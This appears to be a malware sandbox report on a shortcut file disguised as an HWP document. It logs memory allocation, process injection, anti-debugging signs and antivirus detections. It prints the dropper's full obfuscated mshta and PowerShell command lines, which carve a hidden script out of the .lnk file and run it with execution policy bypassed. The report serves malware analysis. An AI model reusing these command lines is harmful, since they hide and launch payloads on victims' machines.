NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0201b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02025000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02026000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05038000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05039000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0503f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\programdata\e.ps1

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Local\Temp\20250402_62842.hwp.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1a2b;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w;
cmdline	powershell -ep bypass -c $t=0x1a2b;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w;
cmdline	"C:\Windows\System32\mshta.exe" javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"\| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\\\*.l"+"nk \| where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 3, 2025, 10:10 a.m.	show_type: 0 filepath_r: powershell parameters: -ep bypass -c $t=0x1a2b;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w; filepath: powershell	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 3, 2025, 10:10 a.m.	process_identifier: 2656 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x034c0000 process_handle: 0xffffffff	1	0	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 3, 2025, 10:10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 3, 2025, 10:10 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1a2b;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w;
cmdline	powershell -ep bypass -c $t=0x1a2b;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\\*.lnk \| where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f \| select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w;
cmdline	"C:\Windows\System32\mshta.exe" javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"\| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem .lnk \| where-object {$_.length -eq $t} \| Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\\\*.l"+"nk \| where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);

Executes JavaScript in a commandline (1 event)

cmdline

"C:\Windows\System32\mshta.exe" javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);

File has been identified by 18 AntiVirus engines on VirusTotal as malicious (18 events)

CTX	lnk.unknown.pantera
VIPRE	Heur.BZC.YAX.Pantera.41.A1B0BB6A
Arcabit	Heur.BZC.YAX.Pantera.41.A1B0BB6A
VirIT	Trojan.LNK.Heur.A
ESET-NOD32	LNK/Agent.AHC
Kaspersky	HEUR:Trojan.Multi.Runner.c
BitDefender	Heur.BZC.YAX.Pantera.41.A1B0BB6A
MicroWorld-eScan	Heur.BZC.YAX.Pantera.41.A1B0BB6A
Emsisoft	Heur.BZC.YAX.Pantera.41.A1B0BB6A (B)
F-Secure	Trojan:W32/LnkGen.C
Sophos	Troj/LnkDrop-M
FireEye	Heur.BZC.YAX.Pantera.41.A1B0BB6A
Google	Detected
ZoneAlarm	Troj/LnkDrop-M
GData	Heur.BZC.YAX.Pantera.41.A1B0BB6A
Zoner	Probably Heur.LNKScript
huorong	Trojan/LNK.Starter.bj
Fortinet	LNK/Agent.AHC!tr

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2544 resumed a thread in remote process 2656
NtResumeThread April 3, 2025, 10:10 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2656	1	0	0

Creates a suspicious Powershell process (3 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-ep bypass	value	Attempts to bypass execution policy
option	-ep bypass	value	Attempts to bypass execution policy

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

20250402_62842.hwp.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All